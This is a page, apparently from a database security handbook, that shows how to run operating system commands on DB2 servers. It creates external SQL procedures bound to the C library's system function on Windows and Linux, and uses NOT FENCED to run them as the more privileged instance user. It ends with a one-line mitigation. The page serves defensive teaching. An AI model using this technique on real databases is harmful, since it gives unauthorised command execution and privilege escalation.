Running Commands Through DB2

Previous page
Table of content
Next page

Running operating system commands is as easy a creating a routine in DB2.

On Windows: 

 CREATE PROCEDURE rootdb2 (IN cmd varchar(200)) EXTERNAL NAME 'e:\winnt\system32\msvcrt!system' LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL     call rootdb2 ('dir > c:\db2.txt')

On Linux: 

 CREATE PROCEDURE rootdb2 (IN cmd varchar(200)) EXTERNAL NAME '/lib/libc.so.6!system' LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL     call rootdb2 ('id > /tmp/id.txt')

If you look at the output of id.txt you find the following: 

 uid=110(db2fenc1) gid=103(db2fgrp1) groups=102(db2grp1),101(dasadm1)

The command runs as the db2fenc1 user. If you want to run commands as the db2inst1 user (which has greater privileges), add the NOT FENCED keyword when creating the procedure. When this is done the output of id shows 

 uid=109(db2inst1) gid=102(db2grp1) groups=102(db2grp1),101(dasadm1)

To prevent users from running operating system commands this way ensure that they haven't been assigned the EXTERNALROUTINEAUTH authority.


Previous page
Table of content
Next page
Database Hacker's Handbook. Defending Database Servers
The Database Hackers Handbook: Defending Database Servers
ISBN: 0764578014
EAN: 2147483647
Year: 2003
Pages: 156
Authors: David Litchfield, Chris Anley, John Heasman, Bill Grindlay
BUY ON AMAZON
Java I/O
Metrics and Models in Software Quality Engineering (2nd Edition)
Identifying and Managing Project Risk: Essential Tools for Failure-Proofing Your Project
Excel Scientific and Engineering Cookbook (Cookbooks (OReilly))
101 Microsoft Visual Basic .NET Applications
Python Programming for the Absolute Beginner, 3rd Edition
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy